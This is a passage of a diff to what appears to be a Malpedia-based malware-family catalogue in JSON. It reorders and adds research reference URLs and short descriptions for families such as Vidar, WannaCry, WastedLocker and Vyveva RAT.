 "https://www.kroll.com/en/insights/publications/cyber/threat-actors-google-ads-deploy-vidar-stealer",
- "https://threatpost.com/microsoft-help-files-vidar-malware/179078/"
+ "https://www.csoonline.com/article/3654849/microsoft-help-files-repurposed-to-contain-vidar-malware-in-new-campaign.html",
+ "https://malwarology.substack.com/p/malicious-packer-pkr_ce1a?r=1lslzd",
+ "https://fumik0.com/2018/12/24/lets-dig-into-vidar-an-arkei-copycat-forked-stealer-in-depth-analysis/",
+ "https://www.team-cymru.com/post/darth-vidar-the-dark-side-of-evolving-threat-infrastructure",
+ "https://www.bleepingcomputer.com/news/security/gandcrab-operators-use-vidar-infostealer-as-a-forerunner/",
+ "https://www.youtube.com/watch?v=NI_Yw2t9zoo",
+ "https://securelist.com/nullmixer-oodles-of-trojans-in-a-single-dropper/107498/",
+ "https://medium.com/s2wlab/deep-analysis-of-vidar-stealer-ebfc3b557aed",
+ "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf"
 ],
 "synonyms": [],
 "type": []
@@ -49649,10 +52060,10 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.vigilant_cleaner",
- "https://blog.cyble.com/2021/08/02/a-deep-dive-analysis-of-a-new-wiper-malware-disguised-as-tokyo-olympics-document/",
- "https://blog.trendmicro.co.jp/archives/28319",
 "https://www.fortinet.com/blog/threat-research/wiper-malware-riding-tokyo-olympic-games",
+ "https://blog.trendmicro.co.jp/archives/28319",
 "https://therecord.media/wiper-malware-targeting-japanese-pcs-discovered-ahead-of-tokyo-olympics-opening/",
+ "https://blog.cyble.com/2021/08/02/a-deep-dive-analysis-of-a-new-wiper-malware-disguised-as-tokyo-olympics-document/",
 "https://www.mbsd.jp/research/20210721/blog/"
 ],
 "synonyms": [
@@ -49681,11 +52092,11 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.virlock",
- "https://www.ciberseguridad.eus/sites/default/files/2022-04/bcsc-malware-virlock-tlpwhite_v1242.pdf",
 "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-recap-january-14-29-2017",
 "https://www.welivesecurity.com/2014/12/22/win32virlock-first-self-reproducing-ransomware-also-shape-shifter/",
 "https://blogs.blackberry.com/en/2019/07/threat-spotlight-virlock-polymorphic-ransomware",
- "https://www.virusbulletin.com/virusbulletin/2016/12/vb2015-paper-its-file-infector-its-ransomware-its-virlock/"
+ "https://www.virusbulletin.com/virusbulletin/2016/12/vb2015-paper-its-file-infector-its-ransomware-its-virlock/",
+ "https://www.ciberseguridad.eus/sites/default/files/2022-04/bcsc-malware-virlock-tlpwhite_v1242.pdf"
 ],
 "synonyms": [],
 "type": []
@@ -49712,12 +52123,12 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.virut",
 "https://www.secureworks.com/research/virut-encryption-analysis",
- "https://www.theregister.co.uk/2018/01/10/taiwanese_police_malware/",
- "https://www.mandiant.com/resources/pe-file-infecting-malware-ot",
 "https://chrisdietri.ch/post/virut-resurrects/",
- "https://krebsonsecurity.com/2013/01/polish-takedown-targets-virut-botnet/",
- "https://securelist.com/review-of-the-virus-win32-virut-ce-malware-sample/36305/",
 "https://blog.malwarebytes.com/threat-analysis/2018/03/blast-from-the-past-stowaway-virut-delivered-with-chinese-ddos-bot/",
+ "https://www.mandiant.com/resources/pe-file-infecting-malware-ot",
+ "https://www.theregister.co.uk/2018/01/10/taiwanese_police_malware/",
+ "https://securelist.com/review-of-the-virus-win32-virut-ce-malware-sample/36305/",
+ "https://krebsonsecurity.com/2013/01/polish-takedown-targets-virut-botnet/",
 "https://www.spamhaus.org/news/article/690/cooperative-efforts-to-shut-down-virut-botnet"
 ],
 "synonyms": [],
@@ -49744,17 +52155,17 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.vjw0rm",
- "https://twitter.com/tccontre18/status/1461386178528264204",
- "https://threatresearch.ext.hp.com/wp-content/uploads/2022/05/HP-Wolf-Security-Threat-Insights-Report-Q1-2022.pdf",
- "https://threatresearch.ext.hp.com/wp-content/uploads/2021/10/HP-Wolf-Security-Threat-Insights-Report-Q3-2021.pdf",
- "https://www.proofpoint.com/us/blog/threat-insight/reservations-requested-ta558-targets-hospitality-and-travel",
- "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf",
- "https://www.deepinstinct.com/blog/understanding-the-windows-javascript-threat-landscape",
+ "https://lifars.com/wp-content/uploads/2021/09/Vjw0rm-.pdf",
 "https://resources.securityscorecard.com/research/acasestudyofVjw0rm#page=1",
- "https://community.riskiq.com/article/24759ad2",
- "https://appriver.com/resources/blog/november-2020/vjw0rm-back-new-tactics",
 "https://bazaar.abuse.ch/browse/signature/Vjw0rm/",
- "https://lifars.com/wp-content/uploads/2021/09/Vjw0rm-.pdf"
+ "https://community.riskiq.com/article/24759ad2",
+ "https://twitter.com/tccontre18/status/1461386178528264204",
+ "https://www.proofpoint.com/us/blog/threat-insight/reservations-requested-ta558-targets-hospitality-and-travel",
+ "https://threatresearch.ext.hp.com/wp-content/uploads/2021/10/HP-Wolf-Security-Threat-Insights-Report-Q3-2021.pdf",
+ "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf",
+ "https://appriver.com/resources/blog/november-2020/vjw0rm-back-new-tactics",
+ "https://www.deepinstinct.com/blog/understanding-the-windows-javascript-threat-landscape",
+ "https://threatresearch.ext.hp.com/wp-content/uploads/2022/05/HP-Wolf-Security-Threat-Insights-Report-Q1-2022.pdf"
 ],
 "synonyms": [],
 "type": []
@@ -49767,8 +52178,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.vmzeus",
- "https://securityintelligence.com/new-zberp-trojan-discovered-zeus-zbot-carberp/",
- "https://blog.malwarebytes.com/threat-analysis/2014/02/hiding-in-plain-sight-a-story-about-a-sneaky-banking-trojan/"
+ "https://blog.malwarebytes.com/threat-analysis/2014/02/hiding-in-plain-sight-a-story-about-a-sneaky-banking-trojan/",
+ "https://securityintelligence.com/new-zberp-trojan-discovered-zeus-zbot-carberp/"
 ],
 "synonyms": [
 "VMzeus",
@@ -49785,9 +52196,9 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.vobfus",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/whats-the-fuss-with-worm_vobfus/",
+ "http://contagiodump.blogspot.com/2012/12/nov-2012-worm-vobfus-samples.html",
 "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/web-attack/151/beebone-botnet-takedown-trend-micro-solutions",
- "http://contagiodump.blogspot.com/2012/12/nov-2012-worm-vobfus-samples.html"
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/whats-the-fuss-with-worm_vobfus/"
 ],
 "synonyms": [
 "Beebone"
@@ -49802,8 +52213,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.vohuk",
- "https://www.fortinet.com/blog/threat-research/ransomware-roundup-new-vohuk-scarecrow-and-aerst-variants",
- "https://github.com/MalGamy/YARA_Rules/blob/main/vohuk.yara"
+ "https://github.com/MalGamy/YARA_Rules/blob/main/vohuk.yara",
+ "https://www.fortinet.com/blog/threat-research/ransomware-roundup-new-vohuk-scarecrow-and-aerst-variants"
 ],
 "synonyms": [],
 "type": []
@@ -49827,23 +52238,51 @@
 "uuid": "55f66b60-5284-4db6-b26e-52b3aea17641",
 "value": "Void"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.voidoor",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/space-pirates-a-look-into-the-group-s-unconventional-techniques-new-attack-vectors-and-tools/#id4"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "e9525c0d-0fba-4a0c-8b9d-31acc21194db",
+ "value": "Voidoor"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.void_rat",
+ "https://resources.securityscorecard.com/research/technical-analysis-of-the-quasar-forked-rat-called-void-rat"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "d78756c3-912a-438e-b9d2-d41ae95f42c3",
+ "value": "VoidRAT"
+ },
 {
 "description": "",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.volgmer",
- "https://securelist.com/lazarus-threatneedle/100803/",
- "https://www.us-cert.gov/ncas/alerts/TA17-318B",
+ "https://asec.ahnlab.com/ko/56256/",
 "https://drive.google.com/file/d/1XoGQFEJQ4nFAUXSGwcnTobviQ_ms35mG/view",
- "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
- "https://securelist.com/apt-trends-report-q2-2020/97937/",
- "https://securelist.com/the-lazarus-group-deathnote-campaign/109490/",
- "https://lifars.com/wp-content/uploads/2021/09/Lazarus.pdf",
- "https://securelist.com/operation-applejeus/87553/",
- "https://drive.google.com/file/d/1lq0Sjw4FKBxf017Ss7W7uGMvs7CgFzcA/view",
- "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
 "https://www.secureworks.com/research/threat-profiles/nickel-academy",
- "https://medium.com/s2wlab/analysis-of-threatneedle-c-c-communication-feat-google-tag-warning-to-researchers-782aa51cf74"
+ "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
+ "https://www.us-cert.gov/ncas/alerts/TA17-318B",
+ "https://securelist.com/operation-applejeus/87553/",
+ "https://lifars.com/wp-content/uploads/2021/09/Lazarus.pdf",
+ "https://medium.com/s2wlab/analysis-of-threatneedle-c-c-communication-feat-google-tag-warning-to-researchers-782aa51cf74",
+ "https://securelist.com/apt-trends-report-q2-2020/97937/",
+ "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
+ "https://drive.google.com/file/d/1lq0Sjw4FKBxf017Ss7W7uGMvs7CgFzcA/view",
+ "https://asec.ahnlab.com/en/56405/",
+ "https://securelist.com/the-lazarus-group-deathnote-campaign/109490/",
+ "https://securelist.com/lazarus-threatneedle/100803/"
 ],
 "synonyms": [
 "FALLCHILL",
@@ -49886,9 +52325,11 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.vsingle",
- "https://blog.talosintelligence.com/2022/09/lazarus-three-rats.html",
+ "https://www.youtube.com/watch?v=nUjxH1gW53s",
 "https://blogs.jpcert.or.jp/en/2022/07/vsingle.html",
- "https://blogs.jpcert.or.jp/en/2021/03/Lazarus_malware3.html"
+ "https://blogs.jpcert.or.jp/en/2021/03/Lazarus_malware3.html",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/stonefly-north-korea-espionage",
+ "https://blog.talosintelligence.com/2022/09/lazarus-three-rats.html"
 ],
 "synonyms": [],
 "type": []
@@ -49924,6 +52365,19 @@
 "uuid": "cfbd52a9-39d6-46f4-a539-76abcec92088",
 "value": "Vulturi"
 },
+ {
+ "description": "Vyveva is a remote access trojan that uses the Tor library for communication with C&C. Its use of fake TLS for camouflaging the network traffic is one of the typical Lazarus traits.\r\n\r\nIt uses a simple XOR for encryption of its configuration and network traffic. \r\n\r\nIt sends detailed information about the victim's environment, like computer name, user name, IP, code page, Windows version, architecture, and time zone.\r\n\r\nIt supports more than 20 commands that include operations on the victim\u2019s filesystem, basic process management, command line execution, file exfiltration, and the download and memory execution of an additional DLL from the C&C (by calling the expected export SamIPromote). As in many RATs from Lazarus arsenal, the commands are indexed by 32-bit integers. The lowest index is 0x3, followed by 0x10, which goes incrementally up to 0x26. Also, it can monitor newly connected drives and the number of logged-on users.\r\n\r\nIt has MPRD.dll as the internal DLL name, and a single export SamIInitialize.\r\n\r\nVyveva RAT was used in an attack against a freight logistics company in South Africa in June 2020.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.vyveva",
+ "https://www.welivesecurity.com/2021/04/08/are-you-afreight-dark-watch-out-vyveva-new-lazarus-backdoor/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "b7f0ba08-8e7c-43cd-9b26-8dfef763a404",
+ "value": "Vyveva RAT"
+ },
 {
 "description": "",
 "meta": {
@@ -49968,42 +52422,43 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.wannacryptor",
- "https://www.youtube.com/watch?v=Q90uZS3taG0",
 "https://securelist.com/big-threats-using-code-similarity-part-1/97239/",
 "https://swanleesec.github.io/posts/Malware-Lazarus-group's-Brambul-worm-of-the-former-Wannacry-1",
- "https://blog.comae.io/wannacry-decrypting-files-with-wanakiwi-demo-86bafb81112d",
- "https://news.sophos.com/en-us/2021/03/15/dearcry-ransomware-attacks-exploit-exchange-server-vulnerabilities/",
- "https://krebsonsecurity.com/2017/05/u-k-hospitals-hit-in-widespread-ransomware-attack/",
- "https://www.microsoft.com/security/blog/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/",
- "https://metaswan.github.io/posts/Malware-Lazarus-group's-Brambul-worm-of-the-former-Wannacry-1",
- "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
- "https://gist.github.com/rain-1/989428fa5504f378b993ee6efbc0b168",
- "https://blog.comae.io/wannacry-the-largest-ransom-ware-infection-in-history-f37da8e30a58",
- "https://blog.gdatasoftware.com/2017/05/29751-wannacry-ransomware-campaign",
- "https://blog.malwarebytes.com/cybercrime/2017/05/how-did-wannacry-ransomworm-spread/",
- "https://resources.malwarebytes.com/files/2020/02/2020_State-of-Malware-Report.pdf",
- "https://i.blackhat.com/eu-20/Wednesday/eu-20-Rivera-From-Zero-To-Sixty-The-Story-Of-North-Koreas-Rapid-Ascent-To-Becoming-A-Global-Cyber-Superpower.pdf",
- "http://www.independent.co.uk/news/uk/home-news/wannacry-malware-hack-nhs-report-cybercrime-north-korea-uk-ben-wallace-a8022491.html",
- "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07170728/Guerrero-Saade-Raiu-VB2017.pdf",
- "https://sites.temple.edu/care/ci-rw-attacks/",
- "https://dissectingmalwa.re/third-times-the-charm-analysing-wannacry-samples.html",
- "https://blog.comae.io/wannacry-new-variants-detected-b8908fefea7e",
- "https://storage.googleapis.com/pub-tools-public-publication-data/pdf/ce44cbda9fdc061050c1d2a5dec0270874a9dc85.pdf",
- "https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/WannaCry-Aftershock.pdf",
- "https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group",
- "https://www.flashpoint-intel.com/blog/linguistic-analysis-wannacry-ransomware/",
- "https://baesystemsai.blogspot.de/2017/05/wanacrypt0r-ransomworm.html",
- "https://www.il-pib.pl/czasopisma/JTIT/2019/1/113.pdf",
- "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/",
- "https://themoscowtimes.com/news/wcry-virus-reportedly-infects-russian-interior-ministrys-computer-network-57984",
- "https://blog.avast.com/ransomware-that-infected-telefonica-and-nhs-hospitals-is-spreading-aggressively-with-over-50000-attacks-so-far-today",
 "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/",
- "https://securelist.com/blog/incidents/78351/wannacry-ransomware-used-in-widespread-attacks-all-over-the-world/",
- "https://docs.microsoft.com/en-us/security/compass/human-operated-ransomware",
- "https://www.malwaretech.com/2017/05/how-to-accidentally-stop-a-global-cyber-attacks.html",
+ "https://www.microsoft.com/security/blog/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/",
+ "https://baesystemsai.blogspot.de/2017/05/wanacrypt0r-ransomworm.html",
+ "https://www.virusbulletin.com/uploads/pdf/magazine/2018/VB2018-Kalnai-Poslusny.pdf",
 "http://blog.emsisoft.com/2017/05/12/wcry-ransomware-outbreak/",
- "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
+ "https://blog.comae.io/wannacry-new-variants-detected-b8908fefea7e",
+ "https://themoscowtimes.com/news/wcry-virus-reportedly-infects-russian-interior-ministrys-computer-network-57984",
+ "https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group",
+ "https://news.sophos.com/en-us/2021/03/15/dearcry-ransomware-attacks-exploit-exchange-server-vulnerabilities/", + "https://blog.avast.com/ransomware-that-infected-telefonica-and-nhs-hospitals-is-spreading-aggressively-with-over-50000-attacks-so-far-today", + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07170728/Guerrero-Saade-Raiu-VB2017.pdf", "https://news.sophos.com/en-us/2019/09/18/the-wannacry-hangover/", + "https://storage.googleapis.com/pub-tools-public-publication-data/pdf/ce44cbda9fdc061050c1d2a5dec0270874a9dc85.pdf", + "https://blog.comae.io/wannacry-decrypting-files-with-wanakiwi-demo-86bafb81112d", + "https://www.flashpoint-intel.com/blog/linguistic-analysis-wannacry-ransomware/", + "https://i.blackhat.com/eu-20/Wednesday/eu-20-Rivera-From-Zero-To-Sixty-The-Story-Of-North-Koreas-Rapid-Ascent-To-Becoming-A-Global-Cyber-Superpower.pdf", + "https://blog.comae.io/wannacry-the-largest-ransom-ware-infection-in-history-f37da8e30a58", + "https://metaswan.github.io/posts/Malware-Lazarus-group's-Brambul-worm-of-the-former-Wannacry-1", + "https://www.youtube.com/watch?v=Q90uZS3taG0", + "https://resources.malwarebytes.com/files/2020/02/2020_State-of-Malware-Report.pdf", + "https://blog.gdatasoftware.com/2017/05/29751-wannacry-ransomware-campaign", + "https://sites.temple.edu/care/ci-rw-attacks/", + "https://blog.malwarebytes.com/cybercrime/2017/05/how-did-wannacry-ransomworm-spread/", + "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/", + "https://gist.github.com/rain-1/989428fa5504f378b993ee6efbc0b168", + "https://www.malwaretech.com/2017/05/how-to-accidentally-stop-a-global-cyber-attacks.html", + "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf", + "https://dissectingmalwa.re/third-times-the-charm-analysing-wannacry-samples.html", + 
"https://securelist.com/blog/incidents/78351/wannacry-ransomware-used-in-widespread-attacks-all-over-the-world/", + "https://krebsonsecurity.com/2017/05/u-k-hospitals-hit-in-widespread-ransomware-attack/", + "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", + "https://www.il-pib.pl/czasopisma/JTIT/2019/1/113.pdf", + "http://www.independent.co.uk/news/uk/home-news/wannacry-malware-hack-nhs-report-cybercrime-north-korea-uk-ben-wallace-a8022491.html", + "https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/WannaCry-Aftershock.pdf", + "https://docs.microsoft.com/en-us/security/compass/human-operated-ransomware", "https://github.com/0xZuk0/rules-of-yaras/blob/main/reports/Wannacry%20Ransomware%20Report.pdf" ], "synonyms": [ @@ -50048,8 +52503,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.wastedloader", - "https://killingthebear.jorgetesta.tech/actors/evil-corp", - "https://www.bitdefender.com/files/News/CaseStudies/study/397/Bitdefender-PR-Whitepaper-RIG-creat5362-en-EN.pdf" + "https://www.bitdefender.com/files/News/CaseStudies/study/397/Bitdefender-PR-Whitepaper-RIG-creat5362-en-EN.pdf", + "https://killingthebear.jorgetesta.tech/actors/evil-corp" ], "synonyms": [], "type": [] 
@@ -50058,57 +52513,57 @@ "value": "WastedLoader" }, { - "description": "WastedLocker is a ransomware detected to be in use since May 2020 by EvilCorp. The ransomware name is derived from the filename that it creates which includes an abbreviation of the victim’s name and the string ‘wasted’. WastedLocker is protected with a custom crypter, referred to as CryptOne by Fox-IT InTELL. On examination, this crypter turned out to be very basic and was used also by other malware families such as: Netwalker, Gozi ISFB v3, ZLoader and Smokeloader. The crypter mainly contains junk code to increase entropy of the sample and hide the actual code.", + "description": "WastedLocker is a ransomware detected to be in use since May 2020 by EvilCorp. The ransomware name is derived from the filename that it creates which includes an abbreviation of the victim\u2019s name and the string \u2018wasted\u2019. WastedLocker is protected with a custom crypter, referred to as CryptOne by Fox-IT InTELL. On examination, this crypter turned out to be very basic and was used also by other malware families such as: Netwalker, Gozi ISFB v3, ZLoader and Smokeloader. 
The crypter mainly contains junk code to increase entropy of the sample and hide the actual code.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.wastedlocker", - "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions", - "https://securelist.com/wastedlocker-technical-analysis/97944/", - "https://seguranca-informatica.pt/wastedlocker-malware-analysis/#.YfAaIRUITTY.twitter", - "https://www.bbc.com/news/world-us-canada-53195749", - "https://blog.bushidotoken.net/2022/07/space-invaders-cyber-threats-that-are.html", - "https://www.crowdstrike.com/blog/hades-ransomware-successor-to-indrik-spiders-wastedlocker/", - "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html", - "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html", - "https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries", - "https://www.bitdefender.com/files/News/CaseStudies/study/397/Bitdefender-PR-Whitepaper-RIG-creat5362-en-EN.pdf", - "https://blog.talosintelligence.com/2020/07/wastedlocker-emerges.html", - "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf", - "https://killingthebear.jorgetesta.tech/actors/evil-corp", - "https://research.nccgroup.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group/", - "https://news.sophos.com/en-us/2020/08/04/wastedlocker-techniques-point-to-a-familiar-heritage/", - "https://www.prodaft.com/m/uploads/SilverFish_TLPWHITE.pdf", - "https://www.sentinelone.com/labs/sanctions-be-damned-from-dridex-to-macaw-the-evolution-of-evil-corp/", - "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself", - "https://www.sentinelone.com/wp-content/uploads/2022/02/S1_-SentinelLabs_SanctionsBeDamned_final_02.pdf", - "https://blog.talosintelligence.com/2021/03/ctir-trends-winter-2020-21.html", - 
"https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf", - "https://unit42.paloaltonetworks.com/atoms/wastedlocker-ransomware/", "https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf", - "https://ioc.hatenablog.com/entry/2020/08/16/132853", - "https://kc.mcafee.com/corporate/index?page=content&id=KB93302&locale=en_US", - "https://www.bleepingcomputer.com/news/security/evil-corp-switches-to-hades-ransomware-to-evade-sanctions/", - "https://www.securonix.com/web/wp-content/uploads/2020/08/Securonix_Threat_Research_WastedLocker_Ransomware.pdf", - "https://symantec.broadcom.com/hubfs/SED-Threats-Financial-Sector.pdf", - "https://unit42.paloaltonetworks.com/wastedlocker/", - "https://blog.malwarebytes.com/threat-spotlight/2020/07/threat-spotlight-wastedlocker-customized-ransomware/", - "http://www.secureworks.com/research/threat-profiles/gold-drake", "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/", - "https://blog.truesec.com/2021/05/05/are-the-notorious-cyber-criminals-evil-corp-actually-russian-spies/", + "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions", + "https://blog.talosintelligence.com/2020/07/wastedlocker-emerges.html", + "https://seguranca-informatica.pt/wastedlocker-malware-analysis/#.YfAaIRUITTY.twitter", + "https://www.sentinelone.com/wp-content/uploads/2022/02/S1_-SentinelLabs_SanctionsBeDamned_final_02.pdf", + "https://news.sophos.com/en-us/2020/08/04/wastedlocker-techniques-point-to-a-familiar-heritage/", + "https://www.bbc.com/news/world-us-canada-53195749", + "https://www.crowdstrike.com/blog/hades-ransomware-successor-to-indrik-spiders-wastedlocker/", "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", - "https://labs.sentinelone.com/wastedlocker-ransomware-abusing-ads-and-ntfs-file-attributes/", - 
"https://www.bleepingcomputer.com/news/security/new-evil-corp-ransomware-mimics-payloadbin-gang-to-evade-us-sanctions/", + "https://research.nccgroup.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group/", + "https://areteir.com/wp-content/uploads/2020/07/Ransomware-WastedLocker-1.pdf", + "https://blog.bushidotoken.net/2022/07/space-invaders-cyber-threats-that-are.html", "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/", - "https://medium.com/walmartglobaltech/wastedloader-or-dridexloader-4f47c9b3ae77", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", - "https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/", + "https://www.securonix.com/web/wp-content/uploads/2020/08/Securonix_Threat_Research_WastedLocker_Ransomware.pdf", "https://www.bleepingcomputer.com/news/security/garmin-outage-caused-by-confirmed-wastedlocker-ransomware-attack/", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/wastedlocker-ransomware-us", + "https://medium.com/walmartglobaltech/wastedloader-or-dridexloader-4f47c9b3ae77", + "https://unit42.paloaltonetworks.com/atoms/wastedlocker-ransomware/", + "https://www.bleepingcomputer.com/news/security/new-evil-corp-ransomware-mimics-payloadbin-gang-to-evade-us-sanctions/", + "https://unit42.paloaltonetworks.com/wastedlocker/", + "https://labs.sentinelone.com/wastedlocker-ransomware-abusing-ads-and-ntfs-file-attributes/", "https://medium.com/cycraft/the-road-to-ransomware-resilience-c1ca37036efd", + "https://assets.sentinelone.com/sentinellabs/sentinellabs_EvilCorp", + "https://kc.mcafee.com/corporate/index?page=content&id=KB93302&locale=en_US", + "https://www.sentinelone.com/labs/sanctions-be-damned-from-dridex-to-macaw-the-evolution-of-evil-corp/", + "https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/", + "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html", + 
"https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/wastedlocker-ransomware-us", + "https://symantec.broadcom.com/hubfs/SED-Threats-Financial-Sector.pdf", + "https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries", + "https://blog.truesec.com/2021/05/05/are-the-notorious-cyber-criminals-evil-corp-actually-russian-spies/", "https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware", "https://www.bleepingcomputer.com/news/security/insurance-giant-cna-hit-by-new-phoenix-cryptolocker-ransomware/", - "https://areteir.com/wp-content/uploads/2020/07/Ransomware-WastedLocker-1.pdf", - "https://assets.sentinelone.com/sentinellabs/sentinellabs_EvilCorp" + "https://killingthebear.jorgetesta.tech/actors/evil-corp", + "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself", + "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf", + "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html", + "https://www.bitdefender.com/files/News/CaseStudies/study/397/Bitdefender-PR-Whitepaper-RIG-creat5362-en-EN.pdf", + "https://www.bleepingcomputer.com/news/security/evil-corp-switches-to-hades-ransomware-to-evade-sanctions/", + "https://securelist.com/wastedlocker-technical-analysis/97944/", + "https://blog.talosintelligence.com/2021/03/ctir-trends-winter-2020-21.html", + "https://blog.malwarebytes.com/threat-spotlight/2020/07/threat-spotlight-wastedlocker-customized-ransomware/", + "https://www.prodaft.com/m/uploads/SilverFish_TLPWHITE.pdf", + "https://ioc.hatenablog.com/entry/2020/08/16/132853", + "http://www.secureworks.com/research/threat-profiles/gold-drake", + 
"https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf" ], "synonyms": [], "type": [] @@ -50121,13 +52576,14 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.waterbear", - "https://teamt5.org/tw/posts/mjib-holds-briefing-on-chinese-hackers-attacks-on-taiwanese-government-agencies/", - "https://www.zdnet.com/article/waterbear-malware-used-in-attack-wave-against-government-agencies/", - "https://i.blackhat.com/asia-21/Friday-Handouts/as-21-Tseng-Mem2Img-Memory-Resident-Malware-Detection-via-Convolution-Neural-Network.pdf", - "https://daydaynews.cc/zh-tw/technology/297265.html", "https://www.youtube.com/watch?v=6SDdUVejR2w", + "https://www.mandiant.com/resources/blog/chinese-espionage-tactics", + "https://www.zdnet.com/article/waterbear-malware-used-in-attack-wave-against-government-agencies/", "https://www.trendmicro.com/en_us/research/19/l/waterbear-is-back-uses-api-hooking-to-evade-security-product-detection.html", - "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_2_ycy-aragorn_en.pdf" + "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_2_ycy-aragorn_en.pdf", + "https://i.blackhat.com/asia-21/Friday-Handouts/as-21-Tseng-Mem2Img-Memory-Resident-Malware-Detection-via-Convolution-Neural-Network.pdf", + "https://teamt5.org/tw/posts/mjib-holds-briefing-on-chinese-hackers-attacks-on-taiwanese-government-agencies/", + "https://daydaynews.cc/zh-tw/technology/297265.html" ], "synonyms": [ 